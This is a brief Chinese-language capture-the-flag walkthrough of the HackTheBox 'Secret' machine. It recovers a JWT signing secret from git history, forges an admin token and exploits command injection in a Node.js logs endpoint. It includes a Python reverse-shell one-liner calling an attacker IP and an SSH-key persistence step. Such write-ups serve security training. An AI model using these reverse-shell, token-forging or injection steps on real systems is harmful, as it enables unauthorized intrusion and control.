HackTheBox-Secret

https://app.hackthebox.com/machines/408

nmap扫描结果


docs目录介绍了如何调试api,而3000端口是用于api调试的,使用postman进行api调试

注意格式选择JSON而不是TEXT

1
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjNiMTcwMjljNmRlNzA0NWNmMzQxNmUiLCJuYW1lIjoibWkzYWthIiwiZW1haWwiOiJtaTNha2FAbWkzYWthLmNvbSIsImlhdCI6MTY0ODAzOTgyOX0.J0uPhnjO3JNsdsPOoNd-gKbgU_d-voRaHp6BlR7Nc04

  1. 尝试将HS256修改成None,无果

  2. http://10.10.11.120/download/files.zip下载源码,尝试从源码中寻找对称加密密钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
//routes/auth.js

router.post('/login', async (req , res) => {

const { error } = loginValidation(req.body)
if (error) return res.status(400).send(error.details[0].message);

// check if email is okay
const user = await User.findOne({ email: req.body.email })
if (!user) return res.status(400).send('Email is wrong');

// check password
const validPass = await bcrypt.compare(req.body.password, user.password)
if (!validPass) return res.status(400).send('Password is wrong');


// create jwt
const token = jwt.sign({ _id: user.id, name: user.name , email: user.email}, process.env.TOKEN_SECRET )
res.header('auth-token', token).send(token);

})
1
2
3
4
//.env

DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = secret

但是经过验证这个TOKEN_SECRET不正确

列了一下目录,发现存在.git目录,尝试恢复git记录

git log查看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
commit e297a2797a5f62b6011654cf6fb6ccb6712d2d5b (HEAD -> master)
Author: dasithsv <[email protected]>
Date: Thu Sep 9 00:03:27 2021 +0530

now we can view logs from server 😃

commit 67d8da7a0e53d8fadeb6b36396d86cdcd4f6ec78
Author: dasithsv <[email protected]>
Date: Fri Sep 3 11:30:17 2021 +0530

removed .env for security reasons

commit de0a46b5107a2f4d26e348303e76d85ae4870934
Author: dasithsv <[email protected]>
Date: Fri Sep 3 11:29:19 2021 +0530

added /downloads

commit 4e5547295cfe456d8ca7005cb823e1101fd1f9cb
Author: dasithsv <[email protected]>
Date: Fri Sep 3 11:27:35 2021 +0530

removed swap

commit 3a367e735ee76569664bf7754eaaade7c735d702
Author: dasithsv <[email protected]>
Date: Fri Sep 3 11:26:39 2021 +0530

added downloads

commit 55fe756a29268f9b4e786ae468952ca4a8df1bd8
Author: dasithsv <[email protected]>
Date: Fri Sep 3 11:25:52 2021 +0530

first commit

git log -p显示每次提交所引入的差异

1
2
-TOKEN_SECRET = gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE
+TOKEN_SECRET = secret

1
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjNiMTcwMjljNmRlNzA0NWNmMzQxNmUiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6Im1pM2FrYUBtaTNha2EuY29tIiwiaWF0IjoxNjQ4MDM5ODI5fQ.iXPlMOgNzfMI5PpQrJsb8pxK93FlHDMIDMw4_aiVlRk


存在命令注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
//routes/private.js

router.get('/logs', verifytoken, (req, res) => {
const file = req.query.file;
const userinfo = { name: req.user }
const name = userinfo.name.name;

if (name == 'theadmin'){
const getLogs = `git log --oneline ${file}`;
exec(getLogs, (err , output) =>{
if(err){
res.status(500).send(err);
return
}
res.json(output);
})
}
else{
res.json({
role: {
role: "you are normal user",
desc: userinfo.name.name
}
})
}
})

1
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.16.20",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'

.ssh/authorized_keys加个公钥即可使用ssh链接